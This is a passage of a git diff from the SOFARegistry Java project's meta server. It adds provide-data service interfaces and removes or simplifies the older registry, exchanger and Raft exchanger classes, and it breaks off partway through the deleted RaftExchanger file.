000000000..64c755f75 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/ProvideDataNotifier.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.provide.data; + +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; + +/** + * @author chen.zhu + *

Dec 03, 2020 + */ +public interface ProvideDataNotifier { + + void notifyProvideDataChange(ProvideDataChangeEvent event); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/ProvideDataService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/ProvideDataService.java new file mode 100644 index 000000000..8d9ca7cb4 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/ProvideDataService.java @@ -0,0 +1,60 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.provide.data; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.server.meta.MetaLeaderService.MetaLeaderElectorListener; +import com.alipay.sofa.registry.store.api.DBResponse; + +/** + * @author xiaojian.xj + * @version $Id: ProvideDataService.java, v 0.1 2021年04月06日 16:17 xiaojian.xj Exp $ + */ +public interface ProvideDataService extends MetaLeaderElectorListener { + + /** + * save or update provideData + * + * @param persistenceData + * @return + */ + boolean saveProvideData(PersistenceData persistenceData); + + /** + * save or update provideData with expectVersion + * + * @param persistenceData + * @return + */ + boolean saveProvideData(PersistenceData persistenceData, long expectVersion); + + /** + * query provideData by key + * + * @param key + * @return + */ + DBResponse queryProvideData(String key); + + /** + * delete provideData + * + * @param key + * @return + */ + boolean removeProvideData(String key); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/package-info.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/package-info.java new file mode 100644 index 000000000..ce0761ad8 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/package-info.java @@ -0,0 +1,34 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.provide.data; + +/** + * The so called "Provide Data" is designed for two scenario, as below: 1. Dynamic Configurations + * inter-active between Sofa-Registry system 2. Service Gaven (or say 'Watcher') are + * subscribing/watching messages through Session-Server + * + *

All above user cases stage a Config Center role by Sofa-Registry And all these infos are + * mandatory being persistence to disk The idea is simple, leveraging meta server's JRaft feature, + * infos are reliable and stable to be stored on MetaServer + * + *

So, besides meta-info control, another functionality has been assigned to MetaServer, that it + * holds some dynamic configs or receive changes from session. And then send out a notification to + * data-servers/session servers, so that these two buddy could come and take some stuff it needs + * + *

Not a big deal, but it's a 'must' feature for MetaServer, be careful if you want to refactor + * this feature + */ diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/registry/MetaServerRegistry.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/registry/MetaServerRegistry.java deleted file mode 100644 index 589c5ce4c..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/registry/MetaServerRegistry.java +++ /dev/null @@ -1,106 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.registry; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.DataCenterNodes; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.bootstrap.ServiceFactory; -import com.alipay.sofa.registry.server.meta.store.StoreService; - -import java.util.Collection; -import java.util.List; - -/** - * factory func to operate StoreService - * @author shangyu.wh - * @version $Id: MetaServerRegistry.java, v 0.1 2018-01-11 21:38 shangyu.wh Exp $ - */ -public class MetaServerRegistry implements Registry { - - private static final Logger LOGGER = LoggerFactory.getLogger(MetaServerRegistry.class); - - @Override - public NodeChangeResult setNodes(List nodes) { - if (nodes == null || nodes.size() == 0) { - throw new IllegalArgumentException("Nodes is empty: " + nodes); - } - StoreService storeService = ServiceFactory.getStoreService(nodes.get(0).getNodeType()); - return storeService.setNodes(nodes); - } - - @Override - public NodeChangeResult register(Node node) { - StoreService storeService = ServiceFactory.getStoreService(node.getNodeType()); - return storeService.addNode(node); - } - - @Override - public void cancel(String connectId, NodeType nodeType) { - StoreService storeService = ServiceFactory.getStoreService(nodeType); - storeService.removeNode(connectId); - } - - @Override - public void evict() { - for (NodeType nodeType : NodeType.values()) { - StoreService storeService = ServiceFactory.getStoreService(nodeType); - if (storeService != null) { - Collection expiredNodes = storeService.getExpired(); - if (expiredNodes != null && !expiredNodes.isEmpty()) { - storeService.removeNodes(expiredNodes); - LOGGER.info("Expired Nodes {} be evicted!", expiredNodes); - } - } - } - } - - @Override - public void reNew(Node node, int duration) { - StoreService storeService = ServiceFactory.getStoreService(node.getNodeType()); - storeService.reNew(node, duration); - } - - @Override - public void getOtherDataCenterNodeAndUpdate(NodeType nodeType) { - StoreService storeService = ServiceFactory.getStoreService(nodeType); - storeService.getOtherDataCenterNodeAndUpdate(); - } - - @Override - public DataCenterNodes getDataCenterNodes(NodeType nodeType) { - StoreService storeService = ServiceFactory.getStoreService(nodeType); - return storeService.getDataCenterNodes(); - } - - @Override - public NodeChangeResult getAllNodes(NodeType nodeType) { - StoreService storeService = ServiceFactory.getStoreService(nodeType); - return storeService.getNodeChangeResult(); - } - - @Override - public void pushNodeListChange(NodeType nodeType) { - StoreService storeService = ServiceFactory.getStoreService(nodeType); - if (storeService != null) { - storeService.pushNodeListChange(); - } - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/registry/Registry.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/registry/Registry.java deleted file mode 100644 index 2bda79a84..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/registry/Registry.java +++ /dev/null @@ -1,91 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.registry; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.DataCenterNodes; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; - -import java.util.List; - -/** - * - * @author shangyu.wh - * @version $Id: Registry.java, v 0.1 2018-01-11 17:18 shangyu.wh Exp $ - */ -public interface Registry { - - /** - * replace all nodes - * - * @param nodes - * @return - */ - NodeChangeResult setNodes(List nodes); - - /** - * register new node - * one node unique id by connectId "ip:port" - * @return return dataList - * @param node - */ - NodeChangeResult register(T node); - - /** - * Disconnected node cancel it by connectId - * - * @param connectId "ip:port" - */ - void cancel(String connectId, NodeType nodeType); - - /** - * check and evict all node expired, - */ - void evict(); - - /** - * renew node expire time - * @param node - */ - void reNew(T node, int duration); - - /** - * get other dataCenter Nodes change scheduled - * @param nodeType - */ - void getOtherDataCenterNodeAndUpdate(NodeType nodeType); - - /** - * get DataCenter Nodes list contains version - * @param nodeType - * @return - */ - DataCenterNodes getDataCenterNodes(NodeType nodeType); - - /** - * get all dataCenter Node list by NodeType - * @param nodeType - * @return - */ - NodeChangeResult getAllNodes(NodeType nodeType); - - /** - * push node change result - */ - void pushNodeListChange(NodeType nodeType); -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/DataNodeExchanger.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/DataNodeExchanger.java index 1ea35b9b2..c3e9b6bc2 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/DataNodeExchanger.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/DataNodeExchanger.java @@ -16,70 +16,41 @@ */ package com.alipay.sofa.registry.server.meta.remoting; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.Client; -import com.alipay.sofa.registry.remoting.Server; import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.RequestException; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.remoting.exchange.message.Response; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.shared.remoting.ServerSideExchanger; +import com.google.common.annotations.VisibleForTesting; import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; /** - * * @author shangyu.wh * @version $Id: DataNodeExchanger.java, v 0.1 2018-01-23 19:18 shangyu.wh Exp $ */ -public class DataNodeExchanger implements NodeExchanger { - - private static final Logger LOGGER = LoggerFactory.getLogger(DataNodeExchanger.class); - - @Autowired - private MetaServerConfig metaServerConfig; - - @Autowired - private Exchange boltExchange; - - @Override - public Response request(Request request) throws RequestException { - Response response = null; - try { - Server dataServer = boltExchange.getServer(metaServerConfig.getDataServerPort()); - - if (dataServer != null) { - URL url = request.getRequestUrl(); - if (url != null) { - - Channel channel = dataServer.getChannel(url); - - if (channel != null && channel.isConnected()) { - final Object result = dataServer.sendSync(channel, request.getRequestBody(), - metaServerConfig.getDataNodeExchangeTimeout()); - response = () -> result; - } else { - LOGGER.error("DataNode Exchanger get channel error! channel with url:" + url - + " can not be null or disconnected!"); - throw new RequestException( - "DataNode Exchanger get channel error! channel with url:" + url - + " can not be null or disconnected!", - request); - } - } - } - } catch (Exception e) { - LOGGER.error("DataNode Exchanger request data error!", e); - throw new RequestException("DataNode Exchanger request data error!", request, e); - } - return response; - } - - @Override - public Client connectServer() { - return null; - } -} \ No newline at end of file +@Component +public class DataNodeExchanger extends ServerSideExchanger { + + @Autowired private MetaServerConfig metaServerConfig; + + @Override + public int getRpcTimeoutMillis() { + return metaServerConfig.getDataNodeExchangeTimeoutMillis(); + } + + @Override + public int getServerPort() { + return metaServerConfig.getDataServerPort(); + } + + @VisibleForTesting + public DataNodeExchanger setMetaServerConfig(MetaServerConfig metaServerConfig) { + this.metaServerConfig = metaServerConfig; + return this; + } + + @VisibleForTesting + public DataNodeExchanger setBoltExchange(Exchange boltExchange) { + this.boltExchange = boltExchange; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/MetaClientExchanger.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/MetaClientExchanger.java deleted file mode 100644 index 4c48f713e..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/MetaClientExchanger.java +++ /dev/null @@ -1,204 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.remoting; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.MetaNode; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.Client; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.RequestException; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.remoting.exchange.message.Response; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.bootstrap.NodeConfig; -import com.alipay.sofa.registry.server.meta.bootstrap.ServiceFactory; -import com.alipay.sofa.registry.server.meta.store.StoreService; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.ArrayList; -import java.util.Collection; -import java.util.Collections; -import java.util.List; -import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: MetaClientExchanger.java, v 0.1 2018-02-12 17:24 shangyu.wh Exp $ - */ -public class MetaClientExchanger implements NodeExchanger { - - private static final Logger LOGGER = LoggerFactory - .getLogger(MetaClientExchanger.class); - - @Autowired - private MetaServerConfig metaServerConfig; - - @Autowired - private Exchange boltExchange; - - @Autowired - private NodeConfig nodeConfig; - - private Map dataCenterUrlMap = new ConcurrentHashMap<>(); - - private static final int RETRY_TIMES = 3; - - @Override - public Response request(Request request) throws RequestException { - Response response; - - try { - Client metaClient = boltExchange.getClient(Exchange.META_SERVER_TYPE); - URL url = request.getRequestUrl(); - - if (metaClient == null) { - LOGGER.warn( - "MetaClient Exchanger get metaServer connection {} error! Connection can not be null or disconnected!", - url); - metaClient = boltExchange.connect(Exchange.META_SERVER_TYPE, url, new ChannelHandler[0]); - } - - Channel channel = metaClient.getChannel(url); - if (channel == null) { - LOGGER.warn("MetaClient Exchanger get channel {} error or disconnected!", url); - channel = metaClient.connect(url); - } - - final Object result = metaClient.sendSync(channel, request.getRequestBody(), - metaServerConfig.getMetaNodeExchangeTimeout()); - response = () -> result; - } catch (Exception e) { - LOGGER.error("MetaClient Exchanger request data error!", e); - throw new RequestException("MetaClient Exchanger request data error!", request, e); - } - - return response; - } - - @Override - public Client connectServer() { - connectOtherMetaServer(); - return null; - } - - /** - * connect other datacenter's metaServer - */ - public void connectOtherMetaServer() { - Map> configMetaNodeIP = nodeConfig.getMetaNodeIP(); - - StoreService storeService = ServiceFactory.getStoreService(NodeType.META); - NodeChangeResult nodeChangeResult = storeService.getNodeChangeResult(); - Map> registerNodes = nodeChangeResult.getNodes(); - - configMetaNodeIP.forEach((dataCenter, ips) -> { - List metaIps = new ArrayList<>(); - if (!nodeConfig.getLocalDataCenter().equalsIgnoreCase(dataCenter)) { - if (registerNodes != null && registerNodes.get(dataCenter) != null) { - Map metaNodeMap = registerNodes.get(dataCenter); - metaIps.addAll(metaNodeMap.keySet()); - } else { - //first not receive other register - metaIps.addAll(ips); - } - Collections.shuffle(metaIps); - String ip = metaIps.iterator().next(); - try { - URL url = new URL(ip, metaServerConfig.getMetaServerPort()); - - Client metaClient = boltExchange.getClient(Exchange.META_SERVER_TYPE); - if (metaClient != null && metaClient.getChannel(url) != null) { - return; - } - - boltExchange.connect(Exchange.META_SERVER_TYPE, url, new ChannelHandler[0]); - dataCenterUrlMap.putIfAbsent(dataCenter, url); - LOGGER.info("Connect other meta server success! url:" + url); - } catch (Exception e) { - LOGGER.error("Connect other meta server error! IP:" + ip, e); - } - } - }); - } - - /** - * get datacenter's meta server url - * @param dataCenter - * @return - */ - public URL getDataCenterUrl(String dataCenter) { - try { - URL url = dataCenterUrlMap.get(dataCenter); - - if (url != null) { - Client metaClient = boltExchange.getClient(Exchange.META_SERVER_TYPE); - if (metaClient != null && metaClient.getChannel(url) != null) { - return url; - } - } - - Map> configMetaNodeIP = nodeConfig.getMetaNodeIP(); - StoreService storeService = ServiceFactory.getStoreService(NodeType.META); - Map> registerNodes = storeService.getNodeChangeResult() - .getNodes(); - - List metaIps = new ArrayList<>(); - if (registerNodes != null && registerNodes.get(dataCenter) != null) { - metaIps.addAll((registerNodes.get(dataCenter)).keySet()); - } else { - //first not receive other register - metaIps.addAll(configMetaNodeIP.get(dataCenter)); - } - Collections.shuffle(metaIps); - String ip = metaIps.iterator().next(); - URL newUrl = new URL(ip, metaServerConfig.getMetaServerPort()); - for (int i = 0; i <= RETRY_TIMES; i++) { - try { - boltExchange.connect(Exchange.META_SERVER_TYPE, newUrl, new ChannelHandler[0]); - - dataCenterUrlMap.put(dataCenter, newUrl); - - LOGGER.info("Connect other meta server success! url:" + newUrl); - } catch (Exception e) { - int remain = RETRY_TIMES - i; - if (remain > 0) { - LOGGER.error("Connect other meta server error!retry time remain {}", - remain, e); - TimeUnit.MILLISECONDS.sleep(1000); - } else { - LOGGER.error("Connect other meta server error!retry all error!", e); - throw new RuntimeException("Connect other meta server error!", e); - } - } - } - return newUrl; - } catch (Exception e) { - LOGGER.error("Get other meta server url error!", e); - throw new RuntimeException("Get other meta server url error!", e); - } - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/MetaServerExchanger.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/MetaServerExchanger.java index 93c0857ee..5ada7b4fa 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/MetaServerExchanger.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/MetaServerExchanger.java @@ -16,70 +16,27 @@ */ package com.alipay.sofa.registry.server.meta.remoting; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.Client; -import com.alipay.sofa.registry.remoting.Server; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.RequestException; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.remoting.exchange.message.Response; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.shared.remoting.ServerSideExchanger; import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; /** - * * @author shangyu.wh * @version $Id: MetaNodeExchanger.java, v 0.1 2018-02-12 14:22 shangyu.wh Exp $ */ -public class MetaServerExchanger implements NodeExchanger { - - private static final Logger LOGGER = LoggerFactory.getLogger(MetaServerExchanger.class); - - @Autowired - private MetaServerConfig metaServerConfig; - - @Autowired - private Exchange boltExchange; - - @Override - public Response request(Request request) throws RequestException { - Response response = null; - try { - Server metaServer = boltExchange.getServer(metaServerConfig.getMetaServerPort()); - - if (metaServer != null) { - URL url = request.getRequestUrl(); - if (url != null) { +@Component +public class MetaServerExchanger extends ServerSideExchanger { - Channel channel = metaServer.getChannel(url); + @Autowired private MetaServerConfig metaServerConfig; - if (channel != null && channel.isConnected()) { - final Object result = metaServer.sendSync(channel, request.getRequestBody(), - metaServerConfig.getDataNodeExchangeTimeout()); - response = () -> result; - } else { - LOGGER.error("MetaServer Exchanger get channel error! channel with url:" - + url + " can not be null or disconnected!"); - throw new RequestException( - "MetaServer Exchanger get channel error! channel with url:" + url - + " can not be null or disconnected!", - request); - } - } - } - } catch (Exception e) { - LOGGER.error("MetaServer Exchanger request data error!", e); - throw new RequestException("MetaServer Exchanger request data error!", request, e); - } - return response; - } + @Override + public int getRpcTimeoutMillis() { + return metaServerConfig.getMetaNodeExchangeTimeoutMillis(); + } - @Override - public Client connectServer() { - return null; - } -} \ No newline at end of file + @Override + public int getServerPort() { + return metaServerConfig.getMetaServerPort(); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/RaftExchanger.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/RaftExchanger.java deleted file mode 100644 index 6a35b4b7a..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/RaftExchanger.java +++ /dev/null @@ -1,377 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.remoting; - -import com.alipay.sofa.jraft.CliService; -import com.alipay.sofa.jraft.Status; -import com.alipay.sofa.jraft.conf.Configuration; -import com.alipay.sofa.jraft.core.CliServiceImpl; -import com.alipay.sofa.jraft.core.NodeImpl; -import com.alipay.sofa.jraft.entity.PeerId; -import com.alipay.sofa.jraft.option.CliOptions; -import com.alipay.sofa.jraft.rpc.impl.AbstractBoltClientService; -import com.alipay.sofa.registry.common.model.metaserver.MetaNode; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.jraft.bootstrap.RaftClient; -import com.alipay.sofa.registry.jraft.bootstrap.RaftServer; -import com.alipay.sofa.registry.jraft.bootstrap.RaftServerConfig; -import com.alipay.sofa.registry.jraft.processor.FollowerProcessListener; -import com.alipay.sofa.registry.jraft.processor.LeaderProcessListener; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.bootstrap.NodeConfig; -import com.alipay.sofa.registry.server.meta.executor.ExecutorManager; -import com.alipay.sofa.registry.server.meta.registry.Registry; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.Collection; -import java.util.List; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.atomic.AtomicBoolean; -import java.util.stream.Collectors; - -/** - * - * @author shangyu.wh - * @version $Id: RaftExchanger.java, v 0.1 2018-05-22 15:13 shangyu.wh Exp $ - */ -public class RaftExchanger { - - private static final Logger LOGGER = LoggerFactory.getLogger(RaftExchanger.class); - - private static final Logger METRICS_LOGGER = LoggerFactory.getLogger("META-JRAFT-METRICS"); - - @Autowired - private MetaServerConfig metaServerConfig; - - @Autowired - private NodeConfig nodeConfig; - - @Autowired - private Registry metaServerRegistry; - - private RaftServer raftServer; - - private RaftClient raftClient; - - private CliService cliService; - - private AtomicBoolean clientStart = new AtomicBoolean(false); - private AtomicBoolean serverStart = new AtomicBoolean(false); - private AtomicBoolean clsStart = new AtomicBoolean(false); - - /** - * Start Raft server - * @param executorManager - */ - public void startRaftServer(final ExecutorManager executorManager) { - try { - if (serverStart.compareAndSet(false, true)) { - String serverId = NetUtil.genHost(NetUtil.getLocalAddress().getHostAddress(), - metaServerConfig.getRaftServerPort()); - String serverConf = getServerConfig(); - - raftServer = new RaftServer(metaServerConfig.getRaftDataPath(), getGroup(), - serverId, serverConf); - raftServer.setLeaderProcessListener(new LeaderProcessListener() { - @Override - public void startProcess() { - LOGGER.info("Start leader process..."); - executorManager.startScheduler(); - LOGGER.info("Initialize server scheduler success!"); - PeerId leader = new PeerId(NetUtil.getLocalAddress().getHostAddress(), - metaServerConfig.getRaftServerPort()); - raftServer.sendNotify(leader, "leader"); - registerCurrentNode(); - } - - @Override - public void stopProcess() { - LOGGER.info("Stop leader process..."); - executorManager.stopScheduler(); - LOGGER.info("Stop server scheduler success!"); - PeerId leader = new PeerId(NetUtil.getLocalAddress().getHostAddress(), - metaServerConfig.getRaftServerPort()); - raftServer.sendNotify(leader, "leader"); - } - }); - - raftServer.setFollowerProcessListener(new FollowerProcessListener() { - @Override - public void startProcess(PeerId leader) { - LOGGER.info("Start follower process leader {}...", leader); - raftServer.sendNotify(leader, "follower"); - registerCurrentNode(); - } - - @Override - public void stopProcess(PeerId leader) { - LOGGER.info("Stop follower process leader {}...", leader); - raftServer.sendNotify(leader, "follower"); - } - }); - - RaftServerConfig raftServerConfig = new RaftServerConfig(); - raftServerConfig.setMetricsLogger(METRICS_LOGGER); - raftServerConfig.setEnableMetrics(metaServerConfig.isEnableMetrics()); - - raftServer.start(raftServerConfig); - } - } catch (Exception e) { - serverStart.set(false); - LOGGER.error("Start raft server error!", e); - throw new RuntimeException("Start raft server error!", e); - } - } - - /** - * start raft client - */ - public void startRaftClient() { - try { - if (clientStart.compareAndSet(false, true)) { - String serverConf = getServerConfig(); - if (raftServer != null && raftServer.getNode() != null) { - //TODO this cannot be invoke,because RaftAnnotationBeanPostProcessor.getProxy will start first - raftClient = new RaftClient(getGroup(), serverConf, - (AbstractBoltClientService) (((NodeImpl) raftServer.getNode()) - .getRpcService())); - } else { - raftClient = new RaftClient(getGroup(), serverConf); - } - raftClient.start(); - } - } catch (Exception e) { - clientStart.set(false); - LOGGER.error("Start raft client error!", e); - throw new RuntimeException("Start raft client error!", e); - } - } - - /** - * start cli service - */ - public void startCliService() { - if (clsStart.compareAndSet(false, true)) { - try { - cliService = new CliServiceImpl(); - cliService.init(new CliOptions()); - } catch (Exception e) { - LOGGER.error("Start raft cliService error!", e); - throw new RuntimeException("Start raft cliService error!", e); - } - } - } - - private void registerCurrentNode() { - Map> metaMap = nodeConfig.getMetaNodeIP(); - //if current ip existed in config list,register it - if (metaMap != null && metaMap.size() > 0) { - Collection metas = metaMap.get(nodeConfig.getLocalDataCenter()); - String ip = NetUtil.getLocalAddress().getHostAddress(); - if (metas != null && metas.contains(ip)) { - metaServerRegistry.register(new MetaNode(new URL(ip, 0), nodeConfig - .getLocalDataCenter())); - } else { - LOGGER.error( - "Register CurrentNode fail!meta node list config not contains current ip {}", - ip); - throw new RuntimeException( - "Register CurrentNode fail!meta node list config not contains current ip!"); - } - } - } - - /** - * api for change meta node - */ - public void changePeer(List ipAddressList) { - try { - if (cliService != null) { - Configuration peersConf = new Configuration(); - for (String ipAddress : ipAddressList) { - PeerId peer = new PeerId(ipAddress, metaServerConfig.getRaftServerPort()); - peersConf.addPeer(peer); - } - - Status status = cliService.changePeers(getGroup(), getCurrentConfiguration(), - peersConf); - - if (!status.isOk()) { - LOGGER.error("CliService change peer fail!error message {}", - status.getErrorMsg()); - throw new RuntimeException("CliService change peer fail!error message " - + status.getErrorMsg()); - } - } else { - LOGGER.error("cliService can't be null,it must be init first!"); - throw new RuntimeException("cliService can't be null,it must be init first!"); - } - } catch (Exception e) { - LOGGER.error("CliService change peer error!", e); - throw new RuntimeException("CliService change peer error!", e); - } - } - - /** - * api for reset meta node - */ - public void resetPeer(List ipAddressList) { - try { - if (cliService != null) { - Configuration peersConf = new Configuration(); - for (String ipAddress : ipAddressList) { - PeerId peer = new PeerId(ipAddress, metaServerConfig.getRaftServerPort()); - peersConf.addPeer(peer); - } - String ip = NetUtil.getLocalAddress().getHostAddress(); - PeerId localPeer = new PeerId(ip, metaServerConfig.getRaftServerPort()); - Status status = cliService.resetPeer(getGroup(), localPeer, peersConf); - 